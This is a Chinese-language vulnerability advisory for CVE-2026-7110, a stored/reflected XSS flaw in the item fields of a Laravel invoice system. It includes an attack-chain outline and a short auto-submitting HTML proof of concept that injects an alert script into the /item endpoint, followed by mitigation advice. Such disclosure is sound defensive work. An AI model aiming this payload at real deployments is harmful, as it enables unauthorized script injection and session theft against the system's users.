CVE-2026-7110 CVSS 3.5 低危

CVE-2026-7110: Laravel发票系统XSS漏洞

披露日期: 2026-04-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7110

漏洞类型

跨站脚本攻击 (XSS)

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

code-projects Invoice System in Laravel

漏洞概述

code-projects Invoice System in Laravel 1.0版本存在跨站脚本（XSS）漏洞。该漏洞源于/item文件中对`item name/description`参数的处理存在缺陷。攻击者可通过精心构造的恶意参数诱导受害者访问，从而在受害者浏览器中执行任意JavaScript代码，导致数据篡改或会话劫持。

技术细节

该漏洞发生在Laravel Invoice System的/item接口处理逻辑中。由于应用程序未对用户输入的`item name`或`description`字段进行充分的HTML实体编码或过滤，当应用将这些数据反射回页面时，嵌入的恶意脚本会被浏览器解析执行。根据CVSS向量，该攻击需要低权限账号（PR:L）且需要用户交互（UI:R），表明攻击者通常需要诱导受害者点击特制链接。利用此漏洞，攻击者可窃取Cookie或执行恶意操作，主要影响系统完整性（I:L）。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标系统使用code-projects Invoice System in Laravel 1.0，并确认/item接口存在参数输入点。

STEP 2

2. 构造Payload

攻击者构造包含恶意JavaScript代码的Payload，并将其嵌入到`item name/description`参数中。

STEP 3

3. 诱导访问

攻击者将包含恶意参数的链接发送给拥有低权限的合法用户，诱导其点击访问。

STEP 4

4. 执行攻击

用户访问链接后，服务器未过滤恶意代码直接返回页面，浏览器解析并执行脚本，完成攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC for CVE-2026-7110 -->
<!-- Target: /item endpoint -->
<!-- Description: Inject script into item name parameter -->

<html>
<body>
<form action="http://target-url/item" method="POST">
  <input type="text" name="item_name" value="<script>alert('XSS')</script>">
  <input type="text" name="description" value="Test">
  <input type="submit" value="Submit">
</form>
<script>
  // Auto-submit for demonstration
  document.forms[0].submit();
</script>
</body>
</html>

影响范围

code-projects Invoice System in Laravel 1.0

防御指南

临时缓解措施

在未修复前，建议管理员部署Web应用防火墙（WAF）规则，拦截针对/item接口的常见XSS攻击特征。同时，加强对用户输入的临时过滤逻辑，并在服务器端对特殊字符（<, >, ', ", &）进行转义处理。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7110
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7110
3 Details https://www.cvedetails.com/cve/CVE-2026-7110/
4 VulDB https://vuldb.com/cve/CVE-2026-7110
5 Link https://code-projects.org/
6 Link https://gist.github.com/higordiego/dd7f841bbd1b8b951434511d044f7c6e
7 Link https://vuldb.com/submit/800693
8 Link https://vuldb.com/vuln/359711
9 Link https://vuldb.com/vuln/359711/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表